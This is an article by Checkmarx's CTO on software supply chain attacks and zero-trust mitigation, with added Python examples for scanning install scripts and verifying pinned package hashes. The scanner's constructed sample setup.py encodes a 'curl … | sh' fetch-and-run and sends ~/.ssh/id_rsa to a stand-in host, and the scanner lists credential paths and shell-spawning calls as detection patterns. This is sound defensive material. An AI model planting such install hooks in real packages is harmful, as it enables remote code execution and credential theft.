Maty Siman at Checkmarx outlines techniques for mitigating software supply chain risk and explores the open source threat
The SolarWinds breach, the Codecov attack and the Colonial Pipeline shutdown have more than one thing in common. Not only were they devastating and far reaching, but all showed how much damage flows downstream from a single compromised supplier: SolarWinds and Codecov were software supply chain compromises that reached every customer of the affected products, while the Colonial Pipeline ransomware attack, although not delivered through a software supplier, showed what the loss of one provider does to everyone who depends on it. Worryingly, these aren’t the only supply chain attacks we’ve seen this year.
The rise in supply chain attacks is a trend we’re not likely to see slow down either: software and service providers have become common prey for hackers. In fact, according to Gartner, “by 2025, 45% of organisations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021”.
While the targets – businesses and suppliers within the supply chain of large public, private and governmental organisations – remain largely the same, attack vectors are changing, with cyber-criminals becoming more sophisticated in the ways they target organisations.
In the wake of this, and as businesses begin to look more closely at the overall security posture of their supply chains and third-party integrations, we’ll examine these changing attack vectors, as well as the mitigation processes needed to prevent attacks of this kind.
New attack vectors: what’s lurking within
Put simply, supply chain attacks often stem from malicious actors deliberately injecting hard-to-detect, tainted code into software packages, whether commercial or open source. Code quality says nothing about intent: there are already a significant number of libraries which are securely coded and elegantly implemented, and also deeply malicious.
With the ever growing popularity of open source projects, we see an increasingly common risk of threat actors seeding malicious or deliberately vulnerable code into open source packages – an issue organisations and development teams can’t afford to overlook. In fact, recent research found that nearly a fifth of all vulnerabilities within open source software were intentionally planted backdoors.
The issue? This planted code has been written to deliberately hide its intent, making it difficult for developers to know whether they’re putting their organisation at risk by using it. Evaluating the risk is also a complex process: developers need to assess what the code does when it runs, including at install time, and who created it in the first place.
To truly discover the intent behind the code, developers must look at who contributed to it, what other packages they have created and their overall online presence, as well as evaluating what the software actually does: what processes it creates, what ports it opens, what files it reads and what connections it attempts to make.
Doing this by hand for the hundreds of packages and contributors within a supply chain is unsustainable and impractical, and it demands a set of capabilities many organisations simply don’t possess.
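One part of that evaluation can be automated: a first-pass triage of a package’s install-time code for the behaviours just listed (spawning processes, opening connections, decoding embedded payloads, touching credential files). The script below is an added example written for this article, not Checkmarx tooling or code from the original piece; the sample setup.py it scans is constructed to look like a package that phones home during `pip install`, and the call list and path pattern are illustrative starting points rather than a complete signature set.

```python
"""Static triage of a package's install-time code (e.g. setup.py) for behaviours
that warrant human review. Added example, not from the original article.
Parses only; never executes the package's code."""
import ast
import re

# Constructed sample: a setup.py that runs a payload and exfiltrates a key on install.
SAMPLE_SETUP_PY = '''
import base64, os, socket
from setuptools import setup

def _post_install():
    payload = base64.b64decode("Y3VybCBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3ggfCBzaA==")
    os.system(payload.decode())
    s = socket.create_connection(("example.invalid", 4444))
    s.send(open(os.path.expanduser("~/.ssh/id_rsa"), "rb").read())

setup(name="totally-fine-utils", version="0.1.0")
_post_install()
'''

# Call sites worth a look when they appear in code that runs at install time
# (illustrative list; a real scanner would be broader and version-aware).
SUSPICIOUS_CALLS = {
    "os.system": "spawns a shell",
    "subprocess.Popen": "spawns a process",
    "subprocess.run": "spawns a process",
    "subprocess.call": "spawns a process",
    "socket.create_connection": "opens a network connection",
    "socket.socket": "opens a raw socket",
    "urllib.request.urlopen": "makes an HTTP request",
    "requests.get": "makes an HTTP request",
    "base64.b64decode": "decodes an embedded payload",
    "exec": "executes dynamically built code",
    "eval": "executes dynamically built code",
}

# String literals naming credential material or package-manager secrets.
SENSITIVE_PATHS = re.compile(r"\.ssh|\.aws|\.npmrc|\.pypirc|id_rsa|credentials")


def _dotted_name(node):
    """Return 'pkg.attr.attr' for a Name/Attribute chain, or None for other callees."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_install_script(source):
    """Return sorted (line, finding) tuples describing behaviours to review."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"{name}: {SUSPICIOUS_CALLS[name]}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SENSITIVE_PATHS.search(node.value):
                findings.append((node.lineno, f"references sensitive path {node.value!r}"))
    return sorted(findings)


def needs_review(source):
    """True when the install script should be held for manual or sandboxed analysis."""
    return bool(scan_install_script(source))


if __name__ == "__main__":
    for line, finding in scan_install_script(SAMPLE_SETUP_PY):
        print(f"line {line}: {finding}")
```

Static triage of this kind is the cheap half of the job: it catches the obvious cases and decides which packages earn a run in an instrumented sandbox, where the processes, ports and connections the text mentions can be observed directly. It will not see through heavier obfuscation or behaviour that only appears at runtime, which is why both halves are needed.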
A new mindset: adopting a zero-trust approach
As previously mentioned, to avoid becoming either a victim or an unwilling accomplice of a software supply chain attack, organisations need to carefully assess the software components used in their applications. While there are technology solutions on the market that can support this risk analysis, development and security teams must cover the basics before employing them; specifically, the implementation of a zero-trust approach.
A strategic cyber-security model, zero-trust means organisations trust nothing at face value, whether it sits inside or outside their network perimeter. By working on the premise that everything and everyone trying to access or connect to an organisation’s systems is untrusted until verified, businesses can reduce the risk of both attacks and vulnerabilities slipping through the cracks.
This is especially true when it comes to open source packages, and developers must be responsible for applying a zero-trust security mindset to external code packages being adopted into modern applications. Taking a critical eye to open source components and gaining visibility into the health, trustworthiness, provenance, and risk is essential in this effort.
As part of this, we would recommend CISOs take it upon themselves to understand how each vendor within their supply chain has protected themselves, specifically when it comes to securing the open source software they’re incorporating into their products.
Not only this, the zero-trust mindset also lends itself to wider supply chain security. No vendor, no matter their size or reputation, should be allowed into a supply chain without the necessary checks being put in place first. Trust nothing and no one until the proper due diligence is performed.
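Applied to the open source packages discussed above, zero-trust has a concrete mechanical form: a dependency is installed only if it is pinned to an exact version and the bytes that arrive match a digest recorded when the package was reviewed. The check below is an added example written for this article, not code from Checkmarx or the original piece. It borrows the `--hash=sha256:` lockfile style pip uses, but the package names, digests and artefact bytes are constructed for illustration.

```python
"""Zero-trust intake for third-party packages: refuse anything that is not
pinned to an exact version, missing from the download set, or whose digest
differs from the one recorded at review time. Added example, not from the
original article; names, digests and artefact bytes are constructed."""
import hashlib
import hmac
import re

# Constructed artefacts standing in for downloaded wheels / tarballs.
ARTEFACTS = {
    "requests": b"requests-2.31.0-py3-none-any.whl (constructed bytes)",
    "shiny-helper": b"shiny_helper-0.9.1.tar.gz (constructed bytes, now tampered)",
}


def sha256_hex(data):
    """Hex sha256 of an artefact's bytes."""
    return hashlib.sha256(data).hexdigest()


# Constructed lockfile: one good pin, one unpinned range, one pin whose digest no
# longer matches the artefact (as after a re-uploaded release), one never downloaded.
LOCKFILE = "\n".join([
    "# constructed for illustration",
    "requests==2.31.0 --hash=sha256:" + sha256_hex(ARTEFACTS["requests"]),
    "leftpad-utils>=1.0",
    "shiny-helper==0.9.1 --hash=sha256:" + "0" * 64,
    "ghost-lib==3.2.0 --hash=sha256:" + "1" * 64,
])

# Exact version plus a sha256 digest; anything else is treated as unpinned.
PIN_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>\S+)"
    r"\s+--hash=sha256:(?P<digest>[0-9a-f]{64})$"
)


def verify_lockfile(lockfile_text, artefacts):
    """Map each requirement to 'ok', 'unpinned', 'hash-mismatch' or 'missing'.
    Only 'ok' entries would be allowed to install."""
    verdicts = {}
    for raw in lockfile_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = PIN_RE.match(line)
        if not m:
            # No exact version and digest: refuse rather than resolve to whatever is newest.
            name = re.split(r"[=<>!~\s]", line, maxsplit=1)[0]
            verdicts[name] = "unpinned"
            continue
        name, expected = m.group("name"), m.group("digest")
        data = artefacts.get(name)
        if data is None:
            verdicts[name] = "missing"
            continue
        # Constant-time compare; a mismatch means the bytes differ from what was reviewed.
        ok = hmac.compare_digest(sha256_hex(data), expected)
        verdicts[name] = "ok" if ok else "hash-mismatch"
    return verdicts


def approved_packages(lockfile_text, artefacts):
    """Names that pass every check; everything else is blocked from installation."""
    return sorted(n for n, v in verify_lockfile(lockfile_text, artefacts).items() if v == "ok")


if __name__ == "__main__":
    for name, verdict in verify_lockfile(LOCKFILE, ARTEFACTS).items():
        print(f"{name}: {verdict}")
```

The digest is recorded when a package is reviewed and admitted, so a later re-upload of the same version number, a mirror serving different bytes, or a build that quietly resolved a newer release all fail closed. The name, version and digest should come from your own lockfile, not from the index you are downloading from, otherwise the check only confirms that the index is consistent with itself.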
The main priority: security
It’s inevitable that organisations will continue to use third-parties to provide necessary services and offerings, and developers will continue to use open source libraries and repositories to expedite their work and build more feature-packed applications. However, a step change needs to happen, with zero-trust at the forefront.
The risk of an attack or breach is far too high to not take supply chain security seriously, and everyone within a business and its partners – whether that’s IT teams, developers, or the C-Suite – must prioritise integral IT security practices across the board.
Alongside this, organisations shouldn’t be put off using open source. While there are risks to using open source packages, as discussed within this piece, their openness allows the community to review the code, build a track record for contributors and detect issues quickly. This, alongside the wider benefits of open source, still makes it a vital tool for development teams.
By taking more rigorous steps to move beyond the mindset of inherent security trust however, the risks of threat actors successfully targeting and breaching your organisation, or a business within its supply chain, can be mitigated. Security must be the number one priority.
Maty Siman is founder and CTO of Checkmarx